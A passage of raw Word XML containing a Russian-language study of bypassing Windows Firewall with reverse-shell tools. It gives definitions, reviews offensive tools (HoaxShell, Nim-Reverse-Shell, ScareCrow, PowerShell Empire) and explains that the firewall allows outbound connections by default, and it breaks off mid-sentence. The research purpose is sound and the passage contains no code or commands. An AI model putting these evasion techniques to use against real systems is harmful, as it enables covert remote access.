        <w:lastRenderedPageBreak/>
        <w:t>– Экспериментально проверить возможность обхода файрвола с использованием Nim-Reverse-Shell и HoaxShell;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2043CDB7" w14:textId="77777777" w:rsidR="0011236C" w:rsidRDefault="0011236C" w:rsidP="0011236C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011236C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>– Оценить устойчивость системы к данным методам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437B859" w14:textId="77777777" w:rsidR="00F167C7" w:rsidRDefault="00F167C7" w:rsidP="00F167C7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Определения терминов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A82A7D" w14:textId="77777777" w:rsidR="00DA0867" w:rsidRPr="00DA0867" w:rsidRDefault="00DA0867" w:rsidP="00DA0867">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Windows – семейство проприетарных операционных систем, разработанных корпорацией Microsoft. Широко используется в корпоративной и пользовательской среде. Включает графический интерфейс, встроенные средства безопасности, сетевой стек и множество компонентов для работы с программами и файлами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7672D66C" w14:textId="77777777" w:rsidR="00DA0867" w:rsidRDefault="00DA0867" w:rsidP="00DA0867">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0867">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> встроенный межсетевой экран в операционных системах </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, предназначенный для фильтрации сетевого трафика. Контролирует входящие и исходящие соединения на основе заданных правил, блокируя нежелательную или потенциально опасную активность.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E98E559" w14:textId="77777777" w:rsidR="00DA0867" w:rsidRDefault="00DA0867" w:rsidP="00DA0867">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Командная строка – текстовый интерфейс, в котором пользователь вводит команды для выполнения их операционной системой. Может быть частью оболочки или отдельным компонентом, как, например</w:t>
      </w:r>
      <w:r w:rsidR="00B9711F" w:rsidRPr="00B9711F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B9711F">
        <w:t>CMD</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в Windows или Terminal в Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA34167" w14:textId="77777777" w:rsidR="00DA0867" w:rsidRPr="00DA0867" w:rsidRDefault="00DA0867" w:rsidP="00DA0867">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Терминал (shell) – интерфейс между пользователем и операционной системой, позволяющий выполнять команды и управлять системой. В контексте shell чаще всего имеется в виду командная оболочка, такая как bash, cmd.exe, powershell, через которую можно запускать команды, скрипты и взаимодействовать с ОС.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2410DD7E" w14:textId="77777777" w:rsidR="00F167C7" w:rsidRDefault="00F167C7" w:rsidP="00F167C7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Реверсивная оболочка</w:t>
      </w:r>
      <w:r w:rsidR="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00DA0867">
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidR="00DA0867" w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA0867">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00DA0867" w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) – это способ удалённого управления компьютером, при котором заражённая машина сама устанавливает </w:t>
      </w:r>
      <w:r w:rsidR="00DA0867" w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>соединение с атакующим, позволяя ему получить удалённый доступ к командной строке или оболочке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360DF2C8" w14:textId="77777777" w:rsidR="00DA0867" w:rsidRPr="00DA0867" w:rsidRDefault="00DA0867" w:rsidP="00DA0867">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0867">
        <w:t>Nim</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:t>Reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – инструмент, реализующий реверсивную оболочку на языке программирования </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:t>Nim</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5027AB7C" w14:textId="77777777" w:rsidR="00DA0867" w:rsidRPr="00DA0867" w:rsidRDefault="00DA0867" w:rsidP="00DA0867">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0867">
        <w:t>Hoaxshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – обфусцированн</w:t>
      </w:r>
      <w:r w:rsidR="002F4BE1" w:rsidRPr="002F4BE1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ая</w:t>
      </w:r>
      <w:r w:rsidR="002F4BE1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, основанная на </w:t>
      </w:r>
      <w:r w:rsidR="002F4BE1">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="002F4BE1" w:rsidRPr="002F4BE1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002F4BE1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> реверсивная оболочка</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, котор</w:t>
      </w:r>
      <w:r w:rsidR="002F4BE1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ая</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> часто используется для обхода стандартных средств защиты, так как маскирует соединение под обычный веб-трафик.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEAA32B" w14:textId="77777777" w:rsidR="00DA0867" w:rsidRDefault="00DA0867" w:rsidP="00F167C7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>msfvenom – компонент фреймворка Metasploit, предназначенный для генерации полезных нагрузок, в том числе реверсивных оболочек, с возможностью обфускации и настройки параметров доставки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70826A68" w14:textId="77777777" w:rsidR="004215AA" w:rsidRPr="004215AA" w:rsidRDefault="00DA0867" w:rsidP="004215AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0867">
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:t>Empire</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – фреймворк для постэксплуатации и командного управления, использующий возможности </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0867">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для создания и управления обратными соединениями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5639040D" w14:textId="77777777" w:rsidR="00C148FC" w:rsidRDefault="004215AA" w:rsidP="00C148FC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Анализ источников</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D52B1" w14:textId="77777777" w:rsidR="004215AA" w:rsidRDefault="004215AA" w:rsidP="004215AA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F56F7A" w:rsidRPr="00F56F7A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В процессе подготовки исследования были проанализированы источники, охватывающие аспекты информационной безопасности, особенности работы брандмауэра Windows и методы обхода сетевых фильтров с использованием реверсивных оболочек.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3A46AF" w14:textId="77777777" w:rsidR="00F56F7A" w:rsidRPr="00F56F7A" w:rsidRDefault="00F56F7A" w:rsidP="00F56F7A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56F7A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Базовые сведения о Windows как операционной системе и о встроенном в неё брандмауэре представлены в материалах [</w:t>
      </w:r>
      <w:r w:rsidR="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56F7A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>][</w:t>
      </w:r>
      <w:r w:rsidR="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56F7A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">]. Эти источники дают представление о функционировании системы безопасности Windows, включая фильтрацию входящих и исходящих соединений, что </w:t>
      </w:r>
      <w:r w:rsidR="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>необходимо</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56F7A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для понимания контекста реализации реверсивных соединений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B6A77A" w14:textId="77777777" w:rsidR="00F56F7A" w:rsidRPr="00F56F7A" w:rsidRDefault="00F56F7A" w:rsidP="00F56F7A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56F7A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Статья Xygeni [</w:t>
      </w:r>
      <w:r w:rsidR="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56F7A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">] раскрывает теоретические аспекты реверсивных оболочек, акцентируя внимание на механизме их функционирования, преимуществах для атакующего и угрозах для защищаемой системы. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B43CF8F" w14:textId="77777777" w:rsidR="00D576F2" w:rsidRDefault="00D576F2" w:rsidP="00F56F7A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Практическое применение реверсивных оболочек представлено в репозиториях GitHub, таких как HoaxShell [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и Nim-Reverse-Shell [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>]. Эти проекты иллюстрируют современные реализации реверсивных соединений с акцентом на обход обнаружения и взаимодействие через нестандартные каналы связи. Дополнительно изучено средство ScareCrow [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>], направленное на обход средств защиты Windows, что также способствует успешной реализации скрытых подключений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337E6B6E" w14:textId="77777777" w:rsidR="00D576F2" w:rsidRDefault="00D576F2" w:rsidP="00F56F7A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Средства пост-эксплуатации, такие как PowerShell Empire [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>], освещают подходы к закреплению доступа и дальнейшему управлению системой после получения первоначального контроля. Этот инструмент подчёркивает комплексность современных атак и необходимость многоуровневой защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC2392" w14:textId="77777777" w:rsidR="00D576F2" w:rsidRPr="004215AA" w:rsidRDefault="00D576F2" w:rsidP="00F56F7A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким образом, проанализированные источники формируют целостное представление о возможностях обхода Windows Firewall с использованием </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">технологии </w:t>
      </w:r>
      <w:r>
        <w:t>reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00D576F2">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D4BE3" w14:textId="77777777" w:rsidR="004215AA" w:rsidRDefault="004215AA" w:rsidP="004215AA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Методы </w:t>
      </w:r>
      <w:r w:rsidR="002E6B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>исследования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF537FB" w14:textId="77777777" w:rsidR="002E6B33" w:rsidRDefault="002E6B33" w:rsidP="002E6B33">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Тип исследования: прикладной анализ с элементами тестирования в виртуальной среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D715CF7" w14:textId="77777777" w:rsidR="002E6B33" w:rsidRDefault="002E6B33" w:rsidP="002E6B33">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E6B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Характеристика выборки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> качестве объектов исследования выбраны </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>такие</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> инструменты для обхода Windows Firewall, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>как</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nim-Reverse-Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> HoaxShell. Тестирование проводилось в среде Windows 11 с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>включенным</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> встроенным брандмауэром.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31086631" w14:textId="77777777" w:rsidR="002E6B33" w:rsidRPr="002E6B33" w:rsidRDefault="002E6B33" w:rsidP="002E6B33">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E6B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Методы сбора данных: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">нформация собиралась путём тестирования описанных инструментов в условиях реального функционирования системы. Проводился запуск реверсивных оболочек с последующей фиксацией реакции системы безопасности, сетевого трафика и поведения брандмауэра. Также </w:t>
      </w:r>
      <w:r w:rsidRPr="002E6B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>использовались данные из технической документации, официальных репозиториев GitHub, профильных статей и аналитических обзоров.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A454663" w14:textId="77777777" w:rsidR="002E6B33" w:rsidRPr="002E6B33" w:rsidRDefault="002E6B33" w:rsidP="002E6B33">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Методы обхода </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00C148FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Firewall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и анализ инструментов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA9FC9C" w14:textId="77777777" w:rsidR="002F4B17" w:rsidRDefault="002F4B17" w:rsidP="002F4B17">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Р</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4B17">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>абота</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4B17">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4B17">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> базируется на модульной фильтрации сетевого трафика, реализуемой через компоненты Windows Filtering Platform (WFP) и Base Filtering Engine (BFE). Архитектура обеспечивает разграничение политик по типам сетевых профилей и уровням взаимодействия, однако при этом допускает исходящие соединения по умолчанию. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Данное</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4B17">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> архитектурное допущение представляет потенциальную уязвимость, эксплуатируемую современными реверсивными оболочками.</w:t>
      </w:r>
      <w:r w:rsidR="00B9711F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CD2CD" w14:textId="77777777" w:rsidR="00E852AE" w:rsidRDefault="00B9711F" w:rsidP="002F4B17">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Одним из самых простых в использовании методов создания реверсивной оболочки является </w:t>
      </w:r>
      <w:r>
        <w:t>Nim</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9711F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9711F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9711F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Данный инструмент разработан на языке программирования </w:t>
      </w:r>
      <w:r>
        <w:t>Nim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и компилируется в исполняемый файл с расширением </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9711F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9711F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00AD0E9A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
